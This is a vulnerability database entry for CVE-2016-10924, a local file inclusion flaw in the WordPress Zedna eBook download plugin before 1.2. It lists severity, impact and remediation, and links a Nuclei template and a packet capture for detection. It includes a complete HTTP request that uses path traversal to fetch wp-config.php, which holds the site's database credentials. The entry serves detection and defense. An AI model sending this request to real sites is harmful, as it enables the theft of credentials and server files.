🔙 목록으로 돌아가기

CVE-2016-10924: Wordpress Zedna eBook download <1.2 - Local File Inclusion

TitleWordpress Zedna eBook download <1.2 - Local File Inclusion
Authoridealphase
SeverityHigh
ImpactAn attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to sensitive information disclosure or remote code execution.
RemediationUpdate to the latest version of the plugin to fix the vulnerability.
CVSS Score7.5
EPSS Score0.62226
CVE IDCVE-2016-10924
CWE IDCWE-22
Tags cve2016 cve wordpress edb wp-plugin lfi ebook wp wpscan zedna_ebook_download_project vkev vuln

🔍 Vulnerability Description

Wordpress Zedna eBook download prior to version 1.2 was affected by a filedownload.php local file inclusion vulnerability.

🌐 HTTP Request

GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; hu-HU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-10924.yaml

🦈 Packet Capture: ⬇️ Download cve-2016-10924.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A